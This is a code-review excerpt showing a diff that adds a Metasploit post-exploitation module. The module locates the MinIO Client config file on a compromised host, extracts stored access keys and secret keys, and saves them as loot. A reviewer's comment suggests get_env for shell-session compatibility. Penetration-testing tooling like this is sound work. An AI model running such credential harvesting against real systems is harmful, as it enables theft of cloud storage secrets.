modules/post/multi/gather/minio_client.rb

```diff
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gather MinIO Client Key',
+        'Description' => %q{
+          This is a module that searches for MinIO Client credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855' ]
+        ],
+        'Author' => ['Kali-Team <kali-team[at]qq.com>'],
+        'Platform' => [ 'win', 'linux', 'osx' ],
+        'SessionTypes' => %w[meterpreter powershell shell],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[]
+          }
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('CONFIG_PATH', [ false, 'Specifies the config file path for MinIO Client']),
+      ]
+    )
+  end
+
+  def parser_minio(config_path)
+    print_status("Parsing file #{config_path}")
+    some_result = Hash.new
+    if file?(config_path)
+      file_contents = read_file(config_path)
+      if file_contents.blank?
+        print_warning('Configuration file content is empty')
+        return some_result
+      end
+      begin
+        configuration = JSON.parse(file_contents)
+        if !configuration['aliases'].nil?
+          some_result = configuration['aliases']
+        end
+      rescue JSON::ParserError => e
+        print_error("Unable to parse configuration:#{e}")
+      end
+    else
+      print_error("Configuration file not found:#{config_path}")
+    end
+    return some_result
+  end
+
+  def print_and_save(all_result)
+    columns = [
+      'name',
+      'url',
+      'accessKey',
+      'secretKey',
+      'api',
+      'path',
+    ]
+    tbl = Rex::Text::Table.new(
+      'Header' => 'MinIO Client Key',
+      'Columns' => columns
+    )
+
+    all_result.each do |name, item|
+      row = [name, item['url'], item['accessKey'], item['secretKey'], item['api'], item['path']]
+      tbl << row
+    end
+
+    print_line(tbl.to_s)
+    if tbl.rows.count > 0
+      path = store_loot('host.minio', 'text/plain', session, tbl, 'minio_client.txt', 'MinIO Client Key')
+      print_good("Session info stored in: #{path}")
+    end
+  end
+
+  def get_config_file_path
+    case session.platform
+    when 'windows'
+      home = session.sys.config.getenv('USERPROFILE')
```

Comment:
This is only compatible with Meterpreter sessions and will break on shell sessions. [`get_env`](https://github.com/rapid7/metasploit-framework/blob/87b1f3b602753e39226a475a5d737fb50200957d/lib/msf/core/post/common.rb#L178) should be used instead, since it handles multiple session types.
```suggestion
      home = get_env('USERPROFILE')
```